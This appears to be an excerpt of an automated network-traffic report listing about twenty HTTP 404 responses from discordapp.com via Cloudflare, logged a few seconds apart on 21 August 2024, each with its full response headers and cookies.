                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:58:30 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=krurwKpbTymLVgA2aApYf0ltPpSMv8HcfCC86x2Xq7s-1724230710-1.0.1.1-MNrwiCoqVqUtpkKjh4noYP0rXrluX.KsR4hgHgRFjksQCVgwhK7qiAPz2EPBejbfS_ENn.0I5daTBoW0ZoqGSg; path=/; expires=Wed, 21-Aug-24 09:28:30 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c32HFYxZxHf0DFmno9id5UAIZLgZ7NmIGHdyPkv7uhTdPFo%2FgCjYf0ZbOfAJADKCoFlZeTed9WsmR3vjZ%2FSuAXIB6gg3EMdn9qj6WbtyiSeQb0jkNmqoJsCGHePr59ldtLnyKg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=OCZA2quprmYGr.uAq_C0UfTwTpojAbtUaQOiPENfxYE-1724230710547-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696bf4df28c330-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:58:37 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=8Cd9jYQ1izsurwmEqPFW3aHF00qy.Vl8W4xd3znwmzg-1724230717-1.0.1.1-Cg_LqgaHwqiHRxVbnFucaKxTTAk.5DElwYM75pzc4aUFc0zFUUj5vN7e7seSzFjszRhkJPNRYrA3BGzjY_73Lg; path=/; expires=Wed, 21-Aug-24 09:28:37 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AN40IHTdZpy5FvY1ZBEtX1LHGiwQx5m64vk4%2Ba7KD%2BUuQaKm%2FkE2CBdAcWZH%2B42UyAd3wxXsZXYLI0KOlOaBxu6uubcPrHEwoG4kvoAKNBum%2BbnkJrFQcu5XC0zU8eTOluvPsg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=Vnv13vlL.9RSrGj1vXXKJoadQxpJWoA6EJKZJyNo2xY-1724230717062-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696c1d98e00f59-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:58:42 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=ZsescNtNQBJnq2y9c_4Fxz0TN2thXuVgGbIveMtnkM8-1724230722-1.0.1.1-ArLH5zt6K0KiWkFgbOYyjfZywBZeYzVhggeOJCNwNl.SR63AR5KdQnortVoGzx6A8O7t9xUtb7o_PPS5jEzgzg; path=/; expires=Wed, 21-Aug-24 09:28:42 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8fOtJHQr%2BDq01%2FmWcHGEbFDJeQT72oXle5VcOwyecLh7yRLbX7SAdFK8628PKRUrYIyHo13ukFd9kgZgp4Bi6YQaAwu6NiAc9e%2BFEqMI0ykSGJpB0QMudHpgaGAbkIjx%2BKjkwQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=yJ63nIIWAxjeSHzhuFsssk4DZoTpKx1ERgmCXNRsJ1Q-1724230722681-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696c40bf06183d-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:58:48 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=4KNDY5YA.7ZVHZEg0lB64S65agZ.ULCcntjwbaxnH0Q-1724230728-1.0.1.1-w1Q4EcpdnxTHG84EfHv.gpl7BgPuOICKNlUFSPySoQOyPw4zLFl9IvIrGTcwa3mJcFIR40nBOWD5qPX6WMIpgQ; path=/; expires=Wed, 21-Aug-24 09:28:48 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AlbKeO9YG1SHnNTf7uiMHu%2BmstTyqQHCewYnX%2BhAivdRBgUnR9N1PjT4YfPzDbK%2BTkmmkdEfYVysU%2F38hXeVHmISVAHrrMpkJIXNhboAgEqWWnoZU8rYG%2FTJAK2wRrQVEwMctg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=o1iLNz6bj2Uohj1MQihczC58zgng.Mp7vvGnaWyOeUU-1724230728299-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696c63ccd7c34b-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:58:54 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=ey1ufPKZPn3objdNt5Cb1EVnz1pHpARgxVwYD11NvaM-1724230734-1.0.1.1-eWAQyhWuRFeo6D9wxxFXWvH5OlYjYkU3lf9FKbCN4GrjLoRZ6mqLFPV3Fo9JQYN.1D36KMug3vFXXI8Px1d9iw; path=/; expires=Wed, 21-Aug-24 09:28:54 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N%2BeB5N3U1PMFtU6NGsqbmeLZGwRaEF5viUTU8yDk7gz4TTMVsh%2Fpvts2ZtjPhDh5zf3RCpIhRyg%2FJg%2F1JeLnajeiM674agm0QjdDRQ%2Bv0VNgjCTwm6wiFGVYr4PGqnzeG9XXzQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=qnge2mMS7zgI4BEBwYdNSuL2PI4AyqmQ0IoU6WFYMVo-1724230734033-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696c87adc20f42-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:58:59 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=inQIpPXoGjHTdRR16lfmIf8AlIOVJ4beJ4kAfo8Fs3Q-1724230739-1.0.1.1-X4Zdyrv6fnzmLBRFO.QE1HHVib1.2b2n7_WEseV2xmhdI.iKWNrneSt90JdW_43JLyBEGLHl7r5eTvO7qKxZYg; path=/; expires=Wed, 21-Aug-24 09:28:59 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n3SIXvAicy4JP2wQA9TBs9SnSUHmtc%2B3dRtrPRKoZvePGomVq9xJ56A8e0qTmyuZvgXwS7pSENMzgvuyqrJ2lViqakWh7IcIe5XqC2QJ0svm9iO7tepFH6VH7adrOoUeAYgxFA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=0Pq.Whoi9etDomuC2APzSn3GmrJQ8OiU8oe45jDs2wA-1724230739688-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696caaffba7cab-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:59:05 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=c6PYn6T0c0Iin.fXT3mH2FYc_JGbSq_aS.CxzV6SgT4-1724230745-1.0.1.1-jznGwhXsPNyewk2AG.ef7uVfgac1zWNCW4qRFzfy0lYbhHJokWJWwtM.hq7D0nkSNzZJxAwo6QQI.qyWMqyn0g; path=/; expires=Wed, 21-Aug-24 09:29:05 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WVuJaTRU1GT172zocGCC%2BLkCimohU2CDTp6HBIUNRmeZizF9jfUKp%2FUjmb2IFdFmQKIR6fwBVqZK0BlBejVtwEWsj3Y71ns38bekz7%2FIM55YNaXQf1fNPvri4rYqe0MBottEAQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=Dq6QkRfgMEtW1GMBBzV5FfC4CdIRSN5bcwmXUOm5HYE-1724230745345-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696cce598f0fa8-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:59:11 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=VQTvQJ3y.uOD5g5c5xaWQNBhmM188o6rIDLGA17ECvE-1724230751-1.0.1.1-l4ROs4WATUeNi3_gvAbRIOgRx6QYhRIGzBZd3HN6JxvjiMze8qjNl362KSX1su1MIr_QwzpgaqyCGjG0ZnCutg; path=/; expires=Wed, 21-Aug-24 09:29:11 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KSMCMHkPUKKo69PhlkvUbfaq2w4M%2Fc2xgPXaCHYscTvO5rECAksPm6wn8GFnxyMseH%2BXJXDZTDaVYxfeDRtQKG0FVgbQu%2B2woN9YiUbVchUQlaHjVD%2BkyN5ghpwoA2DYEswpEA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=qlm_WPNa1tr.980IQ_.FMEitkNc841bngWtopOaTO.U-1724230751170-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696cf2b8da4231-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:59:16 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=Pyqw3b0Di8OWxj7id.OtiugXOixtBidedcXK4GKwRB0-1724230756-1.0.1.1-rz7kJXfS127Fd.FbNPKGQWFWcMQL0AnlHjf5PdQYRaCk49b0MHiDwAADHu5MDs9Z6VCL2pJ_FgrzLpUOLbir3A; path=/; expires=Wed, 21-Aug-24 09:29:16 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NPLlUIMKxdOg3bSkR9WN3hmG06gSa7BVJ3vm0rI3ue57IfTF7GcY8dWK7sSoaUA6g3MnFJ9c1xuG2lzklCZe4lgRWXTmWjREaCOTIxGTM9%2BW8Nw8hTcY%2FiI5Ihapu13b5V3pVA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=On.XWPCCSsi80_kI0t9mbY238fDy6F7wO85JdzOGESg-1724230756797-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696d15e9af0f77-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:59:22 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=r5q_MK8YpFMYPNbcc1.kX8RIiVI1rtNeb4bFxocPKYo-1724230762-1.0.1.1-8Hdd2zz1IHHPvVuBEh.DDYTo4N4tsRJAHAj6yNUcWr3mMDFkfb_DnpFF07XPLwVj.mnZDzEmyBIbnJhRohWrOg; path=/; expires=Wed, 21-Aug-24 09:29:22 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mnKxc6qMscffapdK5t%2Fnee0CXxMVpH%2Fr4F1tc5%2FgWark2gCs95NXGVVmPJtBYCeep1s03ek9li1qVIK1i59aBruDdQB%2BrrdvSoSfpuogiXXM4Tf29fTllI17bv1qv5m6fOioxw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=bUG0XFfKSAkJAqxm47.1o7wP2qf9SbJqpD8R6ET13K4-1724230762433-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696d392f7c0fa8-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:59:28 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=lUWhQ041.lMfsVwD_ObAqgnetF1e6faH6a42qxBSUC4-1724230768-1.0.1.1-ui6c2j7YChLvaWYB2_1ykF_FQKVrPBA6dx2rva5NyVMvwS_y_VdQA6lcVX8ogJ.XfNCZ5tNxSgFczuGbGr08Bg; path=/; expires=Wed, 21-Aug-24 09:29:28 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aIvyOxxUQQzeoC%2F2iCgIfEesd%2FfZqebLYLgR2WG8HlQvR%2Fivgch5wDcLzbo%2FUWcckSc5tzaHPoePVAoKA3Omvr4bZly%2F8pWnytd8D8iyHM2fLyHNcgLbRyugMzmdlZIF8mzyRQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=M3quJcqeq9eAhjRyx1k7x1SjPA_U8AwtU4Uc0fUXMtI-1724230768081-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696d5c6de532e2-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:59:33 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=V_YOpyhs7fWfw_vz2CWkj5fKz7r_7WhhtcWixudnSSw-1724230773-1.0.1.1-OracUGoDq0mWHrpIN9tj7OMnHBQP1y8oRRPWE0_EsmDFRMaS.aZxwGoh_e9g8b3twi3zFoht7tK6O0btn9nfOQ; path=/; expires=Wed, 21-Aug-24 09:29:33 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cm1ZYh%2BUy03nSO56alZ%2F1nKYT%2B5E%2F6jR4uD2Gn9gArx%2FTdsIP6Cg54mNmciCVCBIg%2FXc6pfVAGTSBP0t6xlRAQF%2F7Emlu8pyob5WrGZr2QcFnhAxwUlXnX8MhsvWHL4ewqqOQg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=1EsbuVwMRkLUBKh2Lp9i_6pU0rAVxa0kCETiLsoSo6s-1724230773697-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696d7f7c5f159f-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:59:39 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=VsfeA5YgZU0Alz8.JLAyCajoPQkSuqlniiEt_j69nYo-1724230779-1.0.1.1-RkPFY9dJiAKhFlkDvlNOnJMNXWoB8ebDCCx7XmVieINAE55ouduS.fj13.vPotom183wMaAFvEVAhb80nYmQ.A; path=/; expires=Wed, 21-Aug-24 09:29:39 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y%2FCiPLmv5iDCAvLc9iwjzkbIAUWHDyub%2BUeGp4KnaSHBtPlkBpKV072T9mGPBYjPCMLCwwcXdoqmDC%2BGnUl6PvMOo6%2FC0zyoFiVjlnLiqMKu2rjd6Ps9WKnctqaR%2BT0h4KzVGQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=zL.9I.dDqc9HmiC5tbwb8GcpOGQER.hBqM6ceH0TugY-1724230779332-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696da2b84143c8-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:59:44 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=FMKPU8XYSsF9F0E8B8.nIZRWilKXobToQ0q0_kbPgbs-1724230784-1.0.1.1-0ZxROcpUAUcpmOQ6zkW17EVvZwI26kQ7.Gpsvld8046KgUHFY3tRRKGyT3qzGrrsE7DpPNhZ8uRxMF2h5xIItA; path=/; expires=Wed, 21-Aug-24 09:29:44 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pFSphp%2BEx8xB2aVO%2Bhu4lJkJohZmqW7rn1pJpqUKKcTwiCA%2BRZEpHby87N69J%2FzoBGa4P1OfAa5YDuYyEUyC%2FpNqzCo7PpTYWAk0JYCPHHWKYC0MaKVYs7yLKH41vpAKxGWssA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=u7uVKjud3VTit6vZ4rnlUu29y6DA_m68kF3DnWkReFI-1724230784999-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696dc63cbe1835-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:59:50 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=77JwWXGdx7zwtHQr8u0GrFbJscrwxdofdu5xXN3Bj5Q-1724230790-1.0.1.1-dQ.zCkxriWAduqA4m26I02cvWE50qYc5VyiawPsOifJYMtEaZW5wGSrecfTLdiMC5dFpHgoFFxZZOZyDlRpqrw; path=/; expires=Wed, 21-Aug-24 09:29:50 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SmOK%2FFnaoNgi1y3qLWSDcofay3t6NskD9PG8QN5rxCWdy3BLsIGFgXyRWNHxWmFHVQMBeRF2HYTsdXy4WD499L8AvkPIL3VkTb%2B4HoW1tRV8KGN2Qg00n50RHUeKJozbDmkM0A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=_u.u67H888eUwBaugIH0aV9p8M77z21FJ3a_xZn4fEA-1724230790644-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696de96ef9c434-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:59:56 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=LxyzNDXBY2Kk9o2NsZ3JhND.lw_ckFVrWHhyU4xix3g-1724230796-1.0.1.1-00TUFqbCUQuqKsDCO6Rj1dsXNLy0oagAF0tR.csjiOVDduaOm52Ewl3UJq7J_6g5_5_nQ99QZw9mC_8w_lAoYQ; path=/; expires=Wed, 21-Aug-24 09:29:56 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jKqWpgAQN8iVnLheOYqL8GcBef0W46owytrM81Jnne%2BcwwBPpTkf9vB8GDnxg9w%2BsvBof03rQ82YQIFFfJkPPc70%2FFWAVU0a0GXgm5hYQMOSalZKTXvk6NqjyuDlzLRcOUeAZA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=TWzxHPZwrNypd0f72ewZQEbdNf358qbiQowmXtkIKTc-1724230796254-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696e0c8fc50f60-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 09:00:01 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=UPm4koZUTri1ZBlqVF8jXvLi3g.jW9N_cjK8O4BHZrg-1724230801-1.0.1.1-bLwlr_wS1EaRgraLoj2du7UVMmsmyFhQcDBwMlinMg2nG35wzVgDpSkDhXM5AdD1FE.j03I6OcOOYGsKHrkqGQ; path=/; expires=Wed, 21-Aug-24 09:30:01 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h%2FpogMS1K8ZhkmzVoLG%2B3jYHXMI5ZYSydnHNl%2BejyDsGBIjQFwoB5BvnDDOhe7eCmqSc%2B1aAfQ%2Bl%2FC8wiNvEazgKvyJCQkO%2Bk9%2FVEjL6b%2FtbuPHqP6aabqCsJci1JL7j2Lj3Vg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=Y2mY8.hNfMdokEOoDj0iuWUQlwnHpgixwfmDZcVKAIU-1724230801895-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696e2fc9605e79-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 09:00:07 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=Vlp40VoFFmoxXiL8KGE3_ZeH2T4US26PN79VEjWhP_I-1724230807-1.0.1.1-u7phVtUQvOv_bTuAMKCUAObQJMbhT3DtVW6WpzTimYvxhWWThNpHG0R9L1ZU7sK4bBGs5OahIXyoHzLaLFNjVQ; path=/; expires=Wed, 21-Aug-24 09:30:07 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UMUgkTX5ul2TrLML%2B%2F%2B43X32525q9ZQArTtcZLbGRLr08euEy7q7zNdOmmCZk0gDG2o%2Fixqz2N0IeuKG%2FR2jWPWEvUNYahq8qSSW6RMPvab%2FvMnLe06rr9Mnasd1%2B1dpk0ppTw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=3ltFfUXMdUm_VTaq5ylUa3l99E4g3qYSbYl0_zZcY5o-1724230807530-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696e52fe3543fe-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 09:00:13 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=1oDfCiJh2IGy5_ByXZSTqDKoCPo2aGVmZl_YaSDhUg8-1724230813-1.0.1.1-5mcLTNdpOUS.h28t.cuX4NrPugUmTgKNRngQ6nDu0MF2ikAa61SFtB7._OuYNWI1557.m5mOXrhIOs2m40abAA; path=/; expires=Wed, 21-Aug-24 09:30:13 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dP3KrWc3rNULTb%2B4TJ3upXZEIAhLgKpT2fX7DBYB6CiGvqkS%2Flsu0JGHjqSOxq8msQ%2BA9nRmrz6AeuApMf7LElhrJGS%2Fw1HnN0LxypeR8kGApApZmRAbtgmzeerkQveSt8P9qw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=Ow_u9KO6VJrFgWdqZtkgRYAmxPrDHk3C5.qxnTAqu80-1724230813156-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696e7618ce1821-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 09:00:18 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=vquBfoat0ti8JBRtc2UJDfRrfrFJ_RQq_QmFVBiPXdQ-1724230818-1.0.1.1-ihHMcvoSY3gkQqiaktsrUAwPtSBIqyOved6qF9HWcDEHTOHdIJcvjAMw4s0DOG83iBKeMWyBjKgihrhxGMVvMw; path=/; expires=Wed, 21-Aug-24 09:30:18 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Pnpi%2FLX0fbM4s2AyhAT0U2TW9JW4bSLt3UMJDhopWjgS0dj9EHHelwEyzF9yW7EZEXYKlb9zzrvAYxsDmd0KJOnKOVcxqWwJaCQzdgRqfDdjvfECxVfoCvBd8kwwBzcQSSyygw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=JPBHsANHK21PFW6Acd66B23lW83gpH3t5LvwdRLMOAY-1724230818814-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696e998dcd1906-EWRalt-svc: h3=":443"; ma=86400
